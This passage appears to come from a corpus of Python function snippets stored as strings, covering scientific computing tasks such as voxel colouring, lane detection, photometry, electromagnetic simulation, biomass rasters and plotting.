list()\n\t\t\n\t\tlayNumber = -1\n\t\tfor i in self.slicePoints:\n\t\t\tlayNumber += 1\n\t\t\tboolResult2 = self.voxel_slice(i, self.vertices, self.triangles, self.res, self.llc, self.sliceProto, 2)\n\t\t\tprint boolResult2.shape\n\t\t\ttupleResultR = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\ttupleResultG = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\ttupleResultB = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\t#tupleMaterial = numpy.zeros(boolResult2.shape, dtype=f)\n\t\t\t#lines=self.findSelectedContour(self.vertices,triangleSelected,i ,numpy.array([0,0,1]))\n\t\t\t#boolResult1 = self.findVoxelOfSelectedContour(i, lines, self.res, self.llc, self.sliceProto, depth)\n\t\t\tj = numpy.nditer(boolResult2, flags=['multi_index'], op_flags=['readwrite'])\n\n\t\t\twhile not j.finished:\t\n\t\t\t\tprint type(j.multi_index)\n\t\t\t\tprint j.multi_index\n\t\t\t\tif j[0] == True:\n\t\t\t\t\tfor l in range(len(self.volumeComposition)):\n\t\t\t\t\t\ttupleResultB[j.multi_index] += materials[l].materialColor[0] * self.volumeComposition[l][layNumber][j.multi_index]\n\t\t\t\t\t\ttupleResultG[j.multi_index] += materials[l].materialColor[1] * self.volumeComposition[l][layNumber][j.multi_index]\n\t\t\t\t\t\ttupleResultR[j.multi_index] += materials[l].materialColor[2] * self.volumeComposition[l][layNumber][j.multi_index]\n\t\t\t\telse:\n\t\t\t\t\ttupleResultB[j.multi_index] = 0\n\t\t\t\t\ttupleResultG[j.multi_index] = 0\n\t\t\t\t\ttupleResultR[j.multi_index] = 0\n\t\t\t\tj.iternext()\t\t\t\t\n\t\t\tlayersR.append(tupleResultR)\n\t\t\tlayersG.append(tupleResultG)\n\t\t\tlayersB.append(tupleResultB)\n\t\t\t\t\n\t\tprint \"i got here\"\n\t\tself.volumeR=numpy.array(layersR) # create the 3d volume\n\t\tself.volumeG=numpy.array(layersG) \n\t\tself.volumeB=numpy.array(layersB)\n\n\t\tvolumeGeneral.append(self.volumeR)\n\t\tvolumeGeneral.append(self.volumeG)\n\t\tvolumeGeneral.append(self.volumeB)\n\t\t\n\t\treturn volumeGeneral", "def apply(self, image):\n\n bgr = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n\n # Convert to float image\n float_im = bgr.copy().astype('float32') / 255\n blurred = cv2.GaussianBlur(float_im, ksize=(9, 9), sigmaX=1, sigmaY=9)\n cplanes = colors.bgr2cpaces(blurred)\n lanes, py, pw = finder.find_lane_pixels(cplanes, self.pfilter, gamma=0.4)\n\n binary = lanes\n\n # Find lanes and fit curves\n if not self.curve:\n self.sw.find(binary)\n self.curve= CurveSearch(self.sw.left_fit, self.sw.right_fit,\n image_size=self.warped_image_size, margin=20)\n lane = self.sw.visualize_lane()\n curve_rad = self.measure_curvature(self.sw.left_fit, self.sw.right_fit)\n offset = self.measure_offset(self.sw.left_fit, self.sw.right_fit)\n else:\n self.curve.find(binary)\n lane = self.curve.visualize_lane()\n curve_rad = self.measure_curvature(self.curve.left_fit, self.curve.right_fit)\n offset = self.measure_offset(self.curve.left_fit, self.curve.right_fit)\n\n non_warped_lane = self.warp_inverse(lane)\n\n result = cv2.addWeighted(image, 1, non_warped_lane, 0.3, 0)\n cv2.putText(result, \"Curve Radius: {:.0f}m\".format(curve_rad), (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))\n cv2.putText(result, \"Off Center: {:.2f}m\".format(offset), (50, 100),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255))\n\n return result", "def density_by_ideal_gas_law(\n p: tf.Tensor,\n r: tf.Tensor,\n t: tf.Tensor,\n ) -> tf.Tensor:\n return p / r / t", "def coverage_metrics(area_map, path):\n path = np.array(path).T\n assert path.shape[0] == 2\n x, y = path\n\n \"\"\"\n calculates the distance to travel by the drone\n \"\"\"\n traveled = 0\n angle = 0\n curves = 0\n\n for m in range(len(x)-1):\n traveled += math.sqrt(math.pow(x[m]-x[m+1], 2) + math.pow(y[m]-y[m+1], 2))\n\n \"\"\"\n for n in range(len(x)-2):\n m1 = (y[n+1]-y[n])/(x[n+1]-x[n])\n m2 = (y[n+2]-y[n+1])/(x[n+2]-x[n+1])\n res = m1*m2\n a = np.array([x[n], y[n]])\n b = np.array([x[n+1], y[n+1]])\n c = np.array([x[n + 2], y[n + 2]])\n if res != 0:\n curves +=1\n \"\"\"\n\n\n\n p_len = path.shape[1]\n obs_map = area_map == -1\n obs_points = obs_map.sum()\n total_points_nobs = (~obs_map).sum()\n\n vis_map = obs_map.copy()\n vis_map[x, y] = True\n vis_points = vis_map.sum() - obs_points\n\n coverage = vis_points / total_points_nobs\n redundancy = p_len / vis_points - 1\n\n return {\n \"points_to_visit\": total_points_nobs,\n \"obstacle_points\": obs_points,\n \"points_visited\": vis_points,\n \"coverage_path_len\": p_len,\n \"coverage\": coverage,\n \"redundancy\": redundancy,\n \"area_shape\": area_map.shape,\n \"distance to travel\": traveled,\n \"total curves\": curves\n }", "def growth_curve(userinputs, filter, catalog):\n logging.info('Running growth curve analysis on {}'.format(catalog))\n # Load the photometry results from the catalog (that is returned by the phot\n # function)\n aper_st, flux_st = np.loadtxt(catalog, unpack=True, usecols=(0,3))\n\n #Growth curve is only done on the ref image so we get the filter from userinp.\n ref_filter = filter\n\n ratio_st = np.empty(len(aper_st))\n\n #number of apertures\n naper = 20\n\n # Calculate the number of stars, make sure it is an integer\n nstar = int(len(aper_st)/naper)\n logging.info('Number of stars used: {}'.format(nstar))\n aper_ind = naper - 1\n\n for k in range(nstar):\n\n for i in range(naper):\n\n ratio_st[i + k*naper] = flux_st[i + k*naper]/flux_st[aper_ind + k*naper]\n\n\n # Find median ratio at each aperture between all the stars and all the clusters\n med_st = np.empty(naper)\n\n for i in range(naper):\n\n med_st[i] = np.median(ratio_st[i::naper])\n\n\n # Plot growth curves\n logging.info('Creating Growth curve plots')\n fig = plt.figure(figsize = (7,7))\n\n aper_x = np.arange(naper) + 1\n\n for i in range(nstar):\n\n ratio_y = ratio_st[i*naper:(i + 1)*naper]\n plt.plot(aper_x, ratio_y, 'y-')\n plt.annotate(str(i + 1), xy=(8.0, ratio_y[7]),\n horizontalalignment='left', verticalalignment='top', fontsize=6)\n\n\n plt.plot(aper_x, med_st, 'r-' , linewidth=4.0)\n plt.hlines(0.5, 0, 20, color='black', linewidth=2, zorder=10)\n plt.vlines(4, 0, 1.1, color='black', linewidth=2, linestyle='dashed', zorder=10)\n plt.vlines(5, 0, 1.1, color='black', linewidth=2, linestyle='dashed', zorder=10)\n plt.vlines(6, 0, 1.1, color='black', linewidth=2, linestyle='dashed', zorder=10)\n\n plt.ylabel('Normalized Flux ' + ref_filter.upper())\n plt.xlabel('Radius (pix)')\n plt.xlim(1,20)\n plt.minorticks_on()\n\n fig.savefig(userinputs['OUTDIR'] + '/plots/plot_growth_curve_{}.pdf'.format(ref_filter))", "def rPVI(durations):\n if not durations:\n sys.exit(\"Empty durations. Exit!\")\n s = []\n for idx in range(1,len(durations)):\n s.append(float(durations[idx-1]-durations[idx]))\n\n return np.sum(np.abs(s)) / (len(durations)-1)", "def marc_surr(x):\n# h = thickness = [60,105]\n# a = obliquity = [0,30]\n# v = speed = [2.1,2.8]\n h = x[0] * 25.4 * 1e-3\n a = x[1] * pi/180.0\n v = x[2]\n\n K = 10.3963\n p = 0.4757\n u = 1.0275\n m = 0.4682\n Dp = 1.778\n\n # compare to ballistic limit\n v_bl = ballistic_limit(h,a)\n if v < v_bl:\n return 0\n\n return K * (h/Dp)**p * (cos(a))**u * (tanh((v/v_bl)-1))**m", "def DR(R,Pc):\n return r1*R*(K1**B1/(K1**B1 + (A/R)**B1))*(S/(S + R*Pc + Pc)) \\\n - gwt*A - r2*R*(K2**B2/(K2**B2 + (A)**B2))*(S/(S + R*Pc + Pc) ) \\\n *(R*M)/(K3 + R*M) + R*gc", "def pulsewidth2pct(pw): \n shifted = pw - 500.0\n scaled = shifted / 2000.0 * 100.0\n pct = scaled\n return pct", "def getReciproque(self):\n return lambda y: (y - self.ordinate) / self.slope", "def Fault_geom_PR(strike, dip, rake, az):\n delta = np.deg2rad(dip)\n lambd = np.deg2rad(rake)\n\n phi_az = np.deg2rad(strike - az)\n\n PR = np.cos(lambd) * np.sin(delta) * np.sin(2 * phi_az) - np.sin(lambd) * np.sin(\n delta\n ) * np.cos(delta) * np.cos(2 * phi_az)\n return PR", "def workflow(save_dir):\n year = 2016\n month_series = range(1, 13)\n total_potential_biomass_multiplier = 48.8\n total_standing_biomass_multiplier = 45.25\n biomass_jitter = 3.\n diet_sufficiency_multiplier = 0.28\n diet_sufficiency_jitter = 0.01\n avg_animal_density = 0.0175\n animal_density_jitter = 0.005\n\n # twelve months of precipitation rasters covering the study area\n precip_basename_list = [\n 'chirps-v2.0.{}.{:02d}.tif'.format(year, month) for month in\n month_series]\n\n # reclassify 0 to NoData in CHIRPS rasters\n output_precip_dir = os.path.join(save_dir, 'precip')\n if not os.path.exists(output_precip_dir):\n os.makedirs(output_precip_dir)\n for bn in precip_basename_list:\n base_raster = os.path.join(PRECIP_DIR, bn)\n target_raster = os.path.join(output_precip_dir, bn)\n pygeoprocessing.raster_calculator(\n [(base_raster, 1)], zero_to_nodata, target_raster,\n gdal.GDT_Float32, _IC_NODATA)\n\n # generate outputs\n for month in month_series:\n precip_raster = os.path.join(\n output_precip_dir, 'chirps-v2.0.{}.{:02d}.tif'.format(year, month))\n\n total_potential_biomass_path = os.path.join(\n save_dir, 'potential_biomass_{}_{:02d}.tif'.format(year, month))\n pygeoprocessing.raster_calculator(\n [(precip_raster, 1)] + [(path, 'raw') for path in [\n total_potential_biomass_multiplier,\n biomass_jitter]],\n precip_to_correlated_output, total_potential_biomass_path,\n gdal.GDT_Float32, _IC_NODATA)\n\n total_standing_biomass_path = os.path.join(\n save_dir, 'standing_biomass_{}_{:02d}.tif'.format(year, month))\n pygeoprocessing.raster_calculator(\n [(precip_raster, 1)] + [(path, 'raw') for path in [\n total_standing_biomass_multiplier,\n biomass_jitter]],\n precip_to_correlated_output, total_standing_biomass_path,\n gdal.GDT_Float32, _IC_NODATA)\n\n diet_sufficiency_path = os.path.join(\n save_dir, 'diet_sufficiency_{}_{:02d}.tif'.format(year, month))\n pygeoprocessing.raster_calculator(\n [(precip_raster, 1)] + [(path, 'raw') for path in [\n diet_sufficiency_multiplier,\n diet_sufficiency_jitter]],\n precip_to_correlated_output, diet_sufficiency_path,\n gdal.GDT_Float32, _IC_NODATA)\n\n animal_density_path = os.path.join(\n save_dir, 'animal_density_{}_{:02d}.tif'.format(year, month))\n pygeoprocessing.raster_calculator(\n [(precip_raster, 1)] + [(path, 'raw') for path in [\n avg_animal_density,\n animal_density_jitter]],\n precip_to_animal_density, animal_density_path,\n gdal.GDT_Float32, _IC_NODATA)", "def measure(self, imgage, previous=None):", "def gen_null_seascape(pop,conc,method='curve_fit'):\n if method == 'curve_fit':\n if pop.fitness_data == 'estimate':\n hc = 0\n for key in pop.seascape_library.keys():\n hc += pop.seascape_library[key]['hill_coeff']\n hc = hc/(len(pop.seascape_library.keys()))\n\n landscape = gen_fit_land(pop,conc,hc=hc)\n start_rates = gen_fit_land(pop,10**-3,hc=hc)\n final_rates = gen_fit_land(pop,10**5,hc=hc)\n\n else:\n landscape = gen_fit_land(pop,conc)\n start_rates = gen_fit_land(pop,10**-3)\n final_rates = gen_fit_land(pop,10**5)\n # mid_rates = gen_fit_land(pop,10**1)\n \n # print(landscape)\n start_points = scale_and_ignore_zeros(landscape,start_rates)\n end_points = scale_and_ignore_zeros(landscape,final_rates)\n # mid_points = scale_and_ignore_zeros(landscape,mid_rates)\n mid_points = landscape\n \n xdata = [10**-3,conc,10**5]\n \n ic50_new = []\n drugless_rates_new = []\n\n # fig,ax = plt.subplots()\n \n for genotype in range(len(landscape)):\n\n ydata = [start_points[genotype],\n mid_points[genotype],\n end_points[genotype]]\n \n # ax.scatter(xdata,ydata,label=str(genotype))\n\n params = fit_logistic_curve(xdata,ydata)\n ic50_new.append(params[1])\n drugless_rates_new.append(params[0])\n # find the null landscape drugless rates\n # ax.set_xscale('log')\n # ax.legend()\n drugless_rates_new = scale_and_ignore_zeros(drugless_rates_new,\n pop.drugless_rates)\n\n # fix the fact that genotype 3 in ogbunugafor data has zero fitness\n if hasattr(pop,'ic50_data'):\n if pop.ic50_data[-22:] == 'pyrimethamine_ic50.csv':\n ic50_new[3] = 0\n drugless_rates_new[3] = 0\n \n elif method == 'sort':\n \n landscape = gen_fit_land(pop,conc)\n \n dr = np.array(pop.drugless_rates)\n ic50 = np.array(pop.ic50)\n \n landscape_t = landscape.argsort()\n landscape_ranks = np.empty_like(landscape_t)\n landscape_ranks[landscape_t] = np.arange(len(landscape))\n\n ic50_t = ic50.argsort()\n ic50_ranks = np.empty_like(ic50_t)\n ic50_ranks[ic50_t] = np.arange(len(ic50))\n\n dr_t = dr.argsort()\n dr_ranks = np.empty_like(dr_t)\n dr_ranks[dr_t] = np.arange(len(dr))\n\n ic50_new = np.zeros(len(landscape))\n drugless_rates_new = np.zeros(len(landscape))\n k = 0\n for g in landscape_ranks:\n indx = np.argwhere(ic50_ranks==g)\n indx = indx[0][0]\n ic50_new[k] = ic50[indx]\n\n indx = np.argwhere(dr_ranks==g)\n indx = indx[0][0]\n drugless_rates_new[k] = dr[indx]\n k+=1\n\n # drugless_rates_new = pop.drugless_rates\n\n if pop.fitness_data == 'estimate':\n i = 0\n for key in pop.seascape_lib.keys():\n pop.seascape_lib[key]['ic50'] = ic50_new[i]\n pop.seascape_lib[key]['g_drugless'] = drugless_rates_new[i]\n i+=1\n\n return drugless_rates_new,ic50_new", "def _get_fibonnaci_level(self, prc):\n # position is lower-left ROI\n # use x_min and y_min with width and height to find the position\n # on the graph.\n pos = self.roi.getState()['pos']\n size = self.roi.getState()['size']\n\n y_min = pos[1]\n y_max = pos[1] + size[1]\n variation = y_max - y_min\n\n retracement = []\n retrc = variation * (prc / 100)\n value = y_min + retrc\n retracement.append(value)\n\n return retracement", "def curve(self):\n return (sum(np.outer(basis_function * weight, control_point) for basis_function, control_point, weight in zip(self.basis, self.control_points, self.weights)).T /\n sum(basis_function * weight for basis_function, weight in zip(self.basis, self.weights)).T)", "def burning_residues(self):\n burninginput = self.soil_inputs.residues_input.values[0]\n\n crop = self.soil_inputs.crop.values[0]\n\n if self.language == \"spanish\":\n col_name = \"crop_spanish\"\n else:\n col_name = \"Crop\"\n\n slope_above_ground = ef.ramount_factors.loc[ef.ramount_factors[col_name].str.lower() == crop][\n 'Slope_above ground residue'].values[0]\n drymatter_factor = ef.ramount_factors.loc[ef.ramount_factors[col_name].str.lower() == crop][\n 'DRY(Dry matter fraction of harvested product)'].values[0]\n intercept_factor = ef.ramount_factors.loc[ef.ramount_factors[col_name].str.lower() == crop][\n 'Intercept_above ground residue'].values[0]\n ratiobelowground_residue = ef.ramount_factors.loc[ef.ramount_factors[col_name].str.lower() == crop][\n 'Ratio of belowground to aboveground residue'].values[0]\n\n above_residues = self.crop_yield_kg_ha / 1000 * slope_above_ground * drymatter_factor + intercept_factor\n belowground_residue = above_residues * ratiobelowground_residue\n total_biomas = belowground_residue + above_residues\n\n if ((burninginput == \"quema\") | (burninginput == \"burning\")):\n burningCH4_emissions_kg = above_residues * (ef.burned_CH4factor / 1000) * 1000\n burningN2O_emissions_kg = above_residues * (ef.burned_N2Ofactor / 1000) * 1000\n\n else:\n burningCH4_emissions_kg = 0\n burningN2O_emissions_kg = 0\n\n burning_CH4emissions_kg_CO2eq = burningCH4_emissions_kg * ef.pc_CH4\n burning_N2Oemissions_kg_CO2eq = burningN2O_emissions_kg * ef.pc_N2O_MOT\n total_burning_kg_CO2eq = burning_N2Oemissions_kg_CO2eq + burning_CH4emissions_kg_CO2eq\n\n return (total_burning_kg_CO2eq)", "def apointbiserialr(x,y):\r\n TINY = 1e-30\r\n categories = pstats.aunique(x)\r\n data = pstats.aabut(x,y)\r\n if len(categories) <> 2:\r\n raise ValueError, \"Exactly 2 categories required (in x) for pointbiserialr().\"\r\n else: # there are 2 categories, continue\r\n codemap = pstats.aabut(categories,N.arange(2))\r\n recoded = pstats.arecode(data,codemap,0)\r\n x = pstats.alinexand(data,0,categories[0])\r\n y = pstats.alinexand(data,0,categories[1])\r\n xmean = amean(pstats.acolex(x,1))\r\n ymean = amean(pstats.acolex(y,1))\r\n n = len(data)\r\n adjust = math.sqrt((len(x)/float(n))*(len(y)/float(n)))\r\n rpb = (ymean - xmean)/asamplestdev(pstats.acolex(data,1))*adjust\r\n df = n-2\r\n t = rpb*math.sqrt(df/((1.0-rpb+TINY)*(1.0+rpb+TINY)))\r\n prob = abetai(0.5*df,0.5,df/(df+t*t))\r\n return rpb, prob", "def __CalculateLength(self, curve):\r\n return cv2.arcLength(curve, True)", "def _image_deviation(params):\n # generate the droplet\n data_flat[free] = params\n droplet.data = unstructured_to_structured(data_flat, dtype=dtype)\n droplet.check_data()\n img = droplet._get_phase_field(phase_field.grid)[mask]\n return img - data_mask", "def rho(self, Ppump):\n\n etaP, EsatL, TR = self.etaP, self.EsatL, self.TR\n return(self.Psteady(Ppump) * etaP / (EsatL * TR * self.w0(Ppump)**2))", "def get_sharpe_ratio(allocs, prices):\n\tport_val = get_portfolio_value(prices, allocs, start_val=1.0)\n\tsharpe_ratio = get_portfolio_stats(port_val, daily_rf=0.0, samples_per_year=252)[3]\n\treturn -sharpe_ratio", "def beta_gen_slope(p):\n cardi = 0.005\n return np.array( [0]*int(p-int(cardi*p)) + list(np.arange(1, int(cardi*p)+1, 1)) )", "def exner_function(pressure, reference_pressure=P0):\n return (pressure / reference_pressure)**kappa", "def compute(self): \n Ex=np.zeros((self.nx,self.ny+1))\n Ey=np.zeros((self.nx+1,self.ny))\n Hz=np.zeros((self.nx,self.ny))\n Hzx=np.zeros((self.nx,self.ny))\n Hzy=np.zeros((self.nx,self.ny))\n \n imx = []\n #eps, mu = self.makeenv()\n mu=np.ones((self.nx,self.ny))*const.mu_0\n eps = self.luneberg(int(self.nx/2), int(self.ny*2/3), self.R)\n eps[:20,:] *= self.q #adself.ds a space of higher permittivity \n eps[-20:,:] *= self.q #adself.ds a space of higher permittivity \n eps[:,:20] *= self.q #adself.ds a space of higher permittivity \n eps[:,-20:] *= self.q #adself.ds a space of higher permittivity \n\n c = self.dt/(eps*self.ds)\n d = self.dt/(mu* self.ds)\n \n sigma = self.pml(eps, mu, 20)\n cax = 1 - (sigma[0] * self.dt / eps)\n cay = 1 - (sigma[1] * self.dt / eps)\n dax = 1 - (sigma[2] * self.dt / mu) \n day = 1 - (sigma[3] * self.dt / mu)\n \n bar = progressbar.ProgressBar()\n for n in bar(range(self.nt+1)):\n Ex[:,1:-1] = (cay[:,1:]+cay[:,:-1])/2*Ex[:,1:-1] + (c[:,1:]+c[:,:-1])/2*(Hz[:,1:]-Hz[:,:-1])\n Ey[1:-1,:] = (cax[1:,:]+cax[:-1,:])/2*Ey[1:-1,:] - (c[1:,:]+c[:-1,:])/2*(Hz[1:,:]-Hz[:-1,:])\n \n Hzx = dax*Hzx - d*(Ey[1:,:] - Ey[:-1,:])\n Hzy = day*Hzy + d*(Ex[:,1:] - Ex[:,:-1]) \n Hz = Hzx + Hzy + self.actualsource(self.source, self.f, n, self.dt) \n \n if(n%self.interval == 0): imx.append(Ex[:self.nx,:self.ny]**2 + Ey[:self.nx, :self.ny]**2)\n\n return imx", "def get_reward(self, physics):\n current_mask = np.any(self.image < 100, axis=-1).astype(int)\n area = np.sum(current_mask * self.mask)\n reward = area / np.sum(self.mask)\n\n return reward", "def curve(self):\n return sum(np.outer(basis_function, control_point) for basis_function, control_point in zip(self.basis, self.control_points)).T", "def bndy_plasma(self):\n self.ne[0], self.ne[-1] = 1e11, 1e11\n self.ni[0], self.ni[-1] = 1e11, 1e11\n self.nn[0], self.nn[-1] = 1e11, 1e11\n self.Te[0], self.Te[-1] = 0.1, 0.1\n self.Ti[0], self.Ti[-1] = 0.01, 0.01\n # self.coll_em[0], self.coll_em[-1] = 1e5, 1e5\n # self.coll_im[0], self.coll_im[-1] = 1e5, 1e5", "def plot_sum(self):\n fig, ax = plt.subplots()\n ax.set_title(\"Unpolarized intensity: I_up + I_down\")\n ax.set_xlabel(\"Time (microseconds)\")\n ax.set_ylabel('Intensity')\n\n if (self.is_attribute(\"time\") & self.is_attribute(\"intensity_up\") & \n self.is_attribute(\"intensity_up_sigma\") &\n self.is_attribute(\"intensity_down\") & \n self.is_attribute(\"intensity_down_sigma\") &\n self.is_attribute(\"intensity_up_total\") &\n self.is_attribute(\"intensity_down_total\")):\n np_excl = numpy.array(self.excluded, dtype=bool)\n np_notexcl = numpy.logical_not(np_excl)\n np_time = numpy.array(self.time, dtype=float)\n np_up = numpy.array(self.intensity_up, dtype=float)\n np_sup = numpy.array(self.intensity_up_sigma, dtype=float)\n np_up_mod = numpy.array(self.intensity_up_total, dtype=float)\n np_down = numpy.array(self.intensity_down, dtype=float)\n np_sdown = numpy.array(self.intensity_down_sigma, dtype=float)\n np_down_mod = numpy.array(self.intensity_down_total, dtype=float)\n np_sum = np_up + np_down\n np_sum_mod = np_up_mod + np_down_mod\n np_ssum = numpy.sqrt(numpy.square(np_sup)+numpy.square(np_sdown))\n ax.plot(np_time, np_sum_mod, \"k-\", label=\"model\")\n ax.errorbar(np_time[np_notexcl], np_sum[np_notexcl], yerr=np_ssum[np_notexcl], fmt=\"ko\", alpha=0.2, label=\"experiment\")\n ax.errorbar(np_time[np_excl], np_sum[np_excl], yerr=np_ssum[np_excl], fmt=\"rs\", alpha=0.2, label=\"excluded\")\n\n y_min_d, y_max_d = ax.get_ylim()\n param = y_min_d-(np_sum - np_sum_mod).max()\n coeff = np_notexcl.astype(int)\n\n ax.plot([np_time.min(), np_time.max()], [param, param], \"k:\")\n ax.plot(np_time, coeff*(np_sum - np_sum_mod)+param, \"r-\", alpha=0.7,\n label=\"difference\")\n elif (self.is_attribute(\"time\") & self.is_attribute(\"intensity\") & \n self.is_attribute(\"intensity_total\") &\n self.is_attribute(\"intensity_sigma\")):\n np_excl = numpy.array(self.excluded, dtype=bool)\n np_notexcl = numpy.logical_not(np_excl)\n np_time = numpy.array(self.time, dtype=float)\n np_sum = numpy.array(self.intensity, dtype=float)\n np_sum_mod = numpy.array(self.intensity_total, dtype=float)\n np_ssum = numpy.array(self.intensity_sigma, dtype=float)\n ax.plot(np_time, np_sum_mod, \"k-\", label=\"model\")\n ax.errorbar(np_time[np_notexcl], np_sum[np_notexcl], yerr=np_ssum[np_notexcl], fmt=\"ko\", alpha=0.2, label=\"experiment\")\n ax.errorbar(np_time[np_excl], np_sum[np_excl], yerr=np_ssum[np_excl], fmt=\"rs\", alpha=0.2, label=\"excluded\")\n\n y_min_d, y_max_d = ax.get_ylim()\n param = y_min_d-(np_sum - np_sum_mod).max()\n coeff = np_notexcl.astype(int)\n\n ax.plot([np_time.min(), np_time.max()], [param, param], \"k:\")\n ax.plot(np_time, coeff*(np_sum - np_sum_mod)+param, \"r-\", alpha=0.7,\n label=\"difference\")\n ax.legend(loc='upper right')\n fig.tight_layout()\n return (fig, ax)", "def plotxy_image(self, *args, **kws):\n _beam = kws.get('beam', 'star.01')\n _col1 = kws.get('col1', 1)\n _col2 = kws.get('col1', 3)\n _nbins = kws.get('nbins', 101)\n _nolost = kws.get('nolost', 1)\n _title = kws.get('title', r'Image')\n _xtitle = kws.get('xtitle', 'x - sagittal (Hor. focusing) [cm]')\n _ytitle = kws.get('ytitle', 'z - meridional (E dispersion) [cm]')\n _xrange = kws.get('xrange', None)\n _yrange = kws.get('yrange', None) \n _calfwhm = kws.get('calfwhm', 1)\n _level = kws.get('level', 15)\n _noplot = kws.get('noplot', 0)\n _contour = kws.get('contour', 6)\n return self.plotxy(_beam, _col1, _col2, nbins=_nbins, nolost=_nolost,\\\n title=_title, xtitle=_xtitle, ytitle=_ytitle,\\\n xrange=_xrange, yrange=_yrange,\\\n calfwhm=_calfwhm, noplot=_noplot,\\\n contour=_contour, level=_level)", "def surface_runoff_flux(runoff, drain):\n return runoff - drain", "def make_binning(img, skip=5):\n table = Table.read(\"ellipse.txt\", format=\"ascii\")\n table = table[table[\"sma\"]>10]\n table = table[::skip]\n data, norm = make_masked_img(img)\n ydim, xdim = data.shape\n x, y = np.meshgrid(np.arange(xdim)+1, np.arange(ydim)+1)\n ##########################################################################\n # Set the value of the geometric parameters for the inner region to\n # ignore the dust lane.\n sma_inn = 20\n idxinn = np.where(table[\"sma\"]<=sma_inn)[0]\n e_inn = table[idxinn][\"ellipticity\"][-1]\n pa_inn = table[idxinn][\"pa\"][-1]\n ###########################################################################\n bintable = []\n for i, isophote in enumerate(table):\n ellip = e_inn if isophote[\"sma\"] <= sma_inn else isophote[\"ellipticity\"]\n pa = pa_inn if isophote[\"sma\"] <= sma_inn else isophote[\"pa\"]\n bintable.append([isophote[\"sma\"], ellip, pa])\n e = Ellipse2D(amplitude=1., x_0=213, y_0=235, a=isophote[\"sma\"],\n b=isophote[\"sma\"] * (1 - ellip),\n theta=np.deg2rad(pa))\n if i==0:\n binning = e(x,y)\n continue\n outer = e(x,y)\n ring = np.where((outer>0) & (binning==0))\n binning[ring] = i+1\n binning[binning==0] = np.nan\n bintable = np.array(bintable)\n table = Table(bintable, names=[\"sma\", \"ellipticity\", \"pa\"])\n binning[data.mask] = np.nan\n hdu0 = fits.PrimaryHDU(binning)\n hdu1 = fits.BinTableHDU(table)\n hdulist = fits.HDUList([hdu0, hdu1])\n hdulist.writeto(\"ellipse_binning_v0.fits\", overwrite=True)", "async def get_pressure(self) -> float: # type: ignore\n ...", "def podziel(self):\n def fraktal(dlugosc, alpha, poziom):\n \"\"\"Metoda wyznaczajaca fraktal.\n\n Metoda ta przyjmuje dlugosc, kat oraz poziom drzewa.\n Na bazie podanych parametrow wylicza fraktal z podanych w zadaniu wzorow.\n Zwraca liste zawierajaca punkX oraz punktY fraktalu.\n \"\"\"\n#obliczanie punktow punktu Abis dla kazdego poziomu galezi\n x = float(self.p2[0] + self.dlugosc * cos(alpha))\n y = float(self.p2[1] + self.dlugosc * sin(alpha))\n return [round(x), round(y)]\n\n#petla przechodzaca po wszystkich poziomach drzewa\n while self.tmp <= self.poziom:\n#obliczanie grubosci, dlugosci galezi oraz kolorowanie jej\n self.grubosc = float((2 * self.grubosc + 1) / 3)\n self.dlugosc = float((2 * self.dlugosc) / 3)\n self.kolor += 6\n\n #sprawdzenie czy kolor nie wyszedl po za skale maksymalnej wartosci\n if self.kolor > 255:\n self.kolor = 255\n\n#rozbicie obliczen na poziom 1 i wyzej\n#Abis jest to punkt prawy dla kazdej galezi\n#B jest to punkt srodkowy dla kazdej galezi\n#C jest to punkt srodkowy dla kazdej galezi\n\n#obliczenia dla pierwszego poziomu\n if self.tmp < 2:\n#obliczenie fraktalu, prawa galaz dla kazdej galezi\n#podstawienie obliczonych wartosci z punktu Abis do pozostalych wedlug podanych wzorow\n Abis = fraktal(self.dlugosc, self.alpha, self.poziom)\n B = [round(self.p2[0]), round(Abis[1])]\n C = [round(-Abis[0] + 2 * self.p2[0]), round(Abis[1])]\n\n#zwiekszenie poziomu drzewa o jeden\n self.tmp += 1\n\n#tutaj nastepuje zwrocenie obiektow typu Branch z nowo obliczonymi wartosciami\n return [Branch(self.p2, Abis, self.dlugosc, self.grubosc, self.kolor, self.alpha, self.tmp),\n Branch(self.p2, B, self.dlugosc, self.grubosc, self.kolor, self.alpha, self.tmp),\n Branch(self.p2, C, self.dlugosc, self.grubosc, self.kolor, self.alpha, self.tmp)]\n#obliczenia poziomow wyzej niz pierwszy\n else:\n#obliczanie kata dla punktu prawego\n self.zetprim = randint(-1, 1) * randint(1, self.s)\n self.beta = self.alpha + self.zetprim\n\n#obliczanie kata dla punktu srodkowego\n self.zetbis = randint(-1, 1) * randint(1, self.s)\n self.gamma = self.alpha + self.zetbis\n\n#obliczanie kata dla punktu lewego\n self.zetter = randint(-1, 1) * randint(1, self.s)\n self.teta = self.alpha + self.zetter\n\n#obliczenie fraktalu, prawa galaz dla kazdej galezi\n#podstawienie obliczonych wartosci z punktu Abis do pozostalych wedlug podanych wzorow\n Abis = fraktal(self.dlugosc, self.beta, self.poziom)\n B = [round(self.p2[0]), round(Abis[1])]\n C = [round(-Abis[0] + 2 * self.p2[0]), round(Abis[1])]\n\n#zwiekszenie poziomu drzewa o jeden\n self.tmp += 1\n\n#tutaj nastepuje zwrocenie obiektow typu Branch z nowo obliczonymi wartosciami\n return [Branch(self.p2, Abis, self.dlugosc, self.grubosc, self.kolor, self.beta, self.tmp),\n Branch(self.p2, B, self.dlugosc, self.grubosc, self.kolor, self.gamma, self.tmp),\n Branch(self.p2, C, self.dlugosc, self.grubosc, self.kolor, self.teta, self.tmp)]", "def areaFraction(nb_probes, I):\n P = np.random.randint(I.shape[0], size=(nb_probes, 2))\n\n # count the number of probes in phase\n count = np.sum(I[P[:, 0], P[:, 1]])\n\n# fig=plt.figure();\n# plt.imshow(I);\n# plt.plot(P[:,0], P[:,1], '+');\n# plt.show();\n# fig.savefig('areaFrac.pdf', bbox_inches='tight');\n return float(count) / nb_probes", "def func_Ip_318(pp, pd):\n return pp/(np.pi*(pd/2)**2)", "def deltaGoverRs(self,baselinePercentile=20,save=True):\n self.dGoRs=np.empty((len(self.rois),len(self.timeH)))*np.nan\n for roiNum in range(len(self.rois)):\n try:\n self.dGoRs[roiNum]=self.deltaGoverR(roiNum,baselinePercentile)\n except:\n print(\"FAILED ON ROI:\",roiNum)\n winsound.Beep(440, 1000) # frequency, duration", "def 